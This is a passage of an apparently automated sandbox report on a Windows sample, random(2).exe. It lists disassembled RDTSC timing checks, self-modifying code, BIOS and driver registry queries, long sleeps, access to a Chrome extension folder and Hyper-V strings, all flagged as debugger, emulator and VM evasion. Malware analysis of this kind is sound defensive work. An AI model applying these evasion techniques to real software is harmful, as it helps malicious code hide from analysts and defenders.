Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F07D7 second address: 49F07DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F07DD second address: 49F07E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F07E1 second address: 49F07E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F07E5 second address: 49F080A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0008h 0x0000000b nop 0x0000000c mov eax, esi 0x0000000e pop esi 0x0000000f pop edi 0x00000010 pop ebx 0x00000011 pop ebp 0x00000012 retn 0004h 0x00000015 lea ecx, dword ptr [ebp-50h] 0x00000018 push 0041FD48h 0x0000001d call 00007F294452E842h 0x00000022 push ebp 0x00000023 push ebx 0x00000024 push edi 0x00000025 push esi 0x00000026 mov esi, ecx 0x00000028 mov ebx, dword ptr [esp+14h] 0x0000002c push ebx 0x0000002d call 00007F2948B168A5h 0x00000032 mov edi, edi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2944535546h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F00E0 second address: 49F0148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov al, byte ptr [edx] 0x0000000d jmp 00007F29453582DCh 0x00000012 inc edx 0x00000013 pushad 0x00000014 mov ecx, 57B7393Dh 0x00000019 pushfd 0x0000001a jmp 00007F29453582DAh 0x0000001f jmp 00007F29453582E5h 0x00000024 popfd 0x00000025 popad 0x00000026 test al, al 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F29453582DCh 0x0000002f sub esi, 1837A578h 0x00000035 jmp 00007F29453582DBh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d mov al, F8h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0148 second address: 49F0148 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F294453553Bh 0x00000008 and ah, 0000003Eh 0x0000000b jmp 00007F2944535549h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 jne 00007F29445354A5h 0x0000001a mov al, byte ptr [edx] 0x0000001c jmp 00007F294453553Ch 0x00000021 inc edx 0x00000022 pushad 0x00000023 mov ecx, 57B7393Dh 0x00000028 pushfd 0x00000029 jmp 00007F294453553Ah 0x0000002e jmp 00007F2944535545h 0x00000033 popfd 0x00000034 popad 0x00000035 test al, al 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F294453553Ch 0x0000003e sub esi, 1837A578h 0x00000044 jmp 00007F294453553Bh 0x00000049 popfd 0x0000004a push eax 0x0000004b push edx 0x0000004c mov al, F8h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F01F7 second address: 49F01FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F01FD second address: 49F0297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov al, byte ptr [edi+01h] 0x0000000e jmp 00007F2944535540h 0x00000013 inc edi 0x00000014 jmp 00007F2944535540h 0x00000019 test al, al 0x0000001b jmp 00007F2944535540h 0x00000020 jne 00007F29B5C2DD6Ah 0x00000026 jmp 00007F2944535540h 0x0000002b mov ecx, edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F294453553Dh 0x00000035 pushfd 0x00000036 jmp 00007F2944535540h 0x0000003b xor ecx, 4878D2D8h 0x00000041 jmp 00007F294453553Bh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0297 second address: 49F029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F029D second address: 49F02A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F02A1 second address: 49F030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 shr ecx, 02h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F29453582DDh 0x00000012 xor ax, 4276h 0x00000017 jmp 00007F29453582E1h 0x0000001c popfd 0x0000001d mov di, cx 0x00000020 popad 0x00000021 rep movsd 0x00000023 rep movsd 0x00000025 rep movsd 0x00000027 rep movsd 0x00000029 pushad 0x0000002a mov cx, 9A5Fh 0x0000002e pushfd 0x0000002f jmp 00007F29453582E4h 0x00000034 add cx, 96C8h 0x00000039 jmp 00007F29453582DBh 0x0000003e popfd 0x0000003f popad 0x00000040 mov ecx, edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F030C second address: 49F0327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F041E second address: 49F048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jmp 00007F29453582DCh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edi 0x0000000e jmp 00007F29453582E1h 0x00000013 pop esi 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 jmp 00007F29453582E8h 0x0000001c popad 0x0000001d pop ebx 0x0000001e jmp 00007F29453582E0h 0x00000023 leave 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007F29453582E3h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F048C second address: 49F0491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E4155 second address: 5E4175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007F29453582D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E43BA second address: 5E43E5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F294453554Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E43E5 second address: 5E43EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E43EB second address: 5E43EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49C084F second address: 49C0856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49C0856 second address: 49C088E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop ecx 0x0000000b push edi 0x0000000c mov al, 36h 0x0000000e pop edx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F294453553Ch 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2944535547h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49C088E second address: 49C08BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29453582DDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49B00EC second address: 49B00F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0A63 second address: 49F0A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0A67 second address: 49F0A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535548h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0A83 second address: 49F0A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0A89 second address: 49F0A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0A8D second address: 49F0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007F29453582E9h 0x0000000e push 18F2E141h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F29453582DAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0AC0 second address: 49F0B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 6E05E171h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2944535544h 0x00000017 adc ax, F4A8h 0x0000001c jmp 00007F294453553Bh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0BE4 second address: 49F0C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 78h 0x00000005 mov edi, 761811E2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 mov ah, 5Fh 0x00000012 mov di, B792h 0x00000016 popad 0x00000017 pushad 0x00000018 mov bx, 478Ch 0x0000001c mov ecx, ebx 0x0000001e popad 0x0000001f popad 0x00000020 mov dword ptr [esp], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F29453582DAh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0C13 second address: 49F0C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F294453553Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0C52 second address: 49F0C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0C58 second address: 49F0C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2944535542h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0D1F second address: 49F0D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0D23 second address: 49F0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [ebp-00000118h], eax 0x0000000d jmp 00007F294453553Eh 0x00000012 test eax, eax 0x00000014 jmp 00007F2944535540h 0x00000019 je 00007F29B6A878A9h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2944535547h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0D6F second address: 49F0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0D87 second address: 49F0DC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F2944535546h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ax, dx 0x00000016 mov dx, 8380h 0x0000001a popad 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0DC0 second address: 49F0DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0DC6 second address: 49F0DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0DCC second address: 49F0DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0DD0 second address: 49F0DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0DD4 second address: 49F0DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebx+04h] 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 push 00000027h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F29453582E0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49F0DFA second address: 49F0E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2944535541h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F294453553Fh 0x00000017 sub ah, 0000001Eh 0x0000001a jmp 00007F2944535549h 0x0000001f popfd 0x00000020 mov ah, A3h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00735 second address: 4A0076B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 49FAh 0x00000007 jmp 00007F29453582DBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 movzx ecx, bx 0x00000015 mov eax, ebx 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F29453582DFh 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A0076B second address: 4A0076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A0076F second address: 4A00773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00773 second address: 4A00779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00779 second address: 4A00796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A004A3 second address: 4A004A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A004A8 second address: 4A004F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, B9A8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 pushfd 0x00000011 jmp 00007F29453582E8h 0x00000016 adc si, 2C08h 0x0000001b jmp 00007F29453582DBh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F29453582E0h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A004F8 second address: 4A004FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A004FC second address: 4A00502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00502 second address: 4A00508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00508 second address: 4A0050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A0050C second address: 4A00510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00510 second address: 4A00535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F29453582E4h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00535 second address: 4A00539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00539 second address: 4A00556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00909 second address: 4A009DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2944535547h 0x00000009 or cx, D37Eh 0x0000000e jmp 00007F2944535549h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F294453553Dh 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushad 0x00000022 mov bx, si 0x00000025 call 00007F2944535546h 0x0000002a pop esi 0x0000002b popad 0x0000002c pushfd 0x0000002d jmp 00007F294453553Bh 0x00000032 add eax, 3AD8A2EEh 0x00000038 jmp 00007F2944535549h 0x0000003d popfd 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 jmp 00007F294453553Eh 0x00000046 mov ecx, dword ptr [ebp+08h] 0x00000049 jmp 00007F2944535540h 0x0000004e test ecx, ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F2944535547h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A009DF second address: 4A00A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov di, 9B36h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F29B68DA52Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F29453582E8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00A0B second address: 4A00A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00A11 second address: 4A00A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 4A00A15 second address: 4A00A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49C09C4 second address: 49C09C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 49C09C8 second address: 49C09CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\random(2).exe	Special instruction interceptor: First address: 42C955 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(2).exe	Special instruction interceptor: First address: 42C9F6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(2).exe	Special instruction interceptor: First address: 5D83D8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(2).exe	Special instruction interceptor: First address: 5D86FA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(2).exe	Special instruction interceptor: First address: 42A2F6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(2).exe	Special instruction interceptor: First address: 66B584 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\random(2).exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\random(2).exe TID: 6216	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe TID: 6216	Thread sleep time: -78039s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe TID: 6188	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe TID: 6188	Thread sleep time: -76038s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe TID: 6264	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe TID: 6264	Thread sleep time: -92046s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior

Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partitionll]
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration ServiceY
Source: chrome.exe, 0000000C.00000003.2432227323.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434425374.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2430756068.00000249D6721000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root PartitionRH
Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition
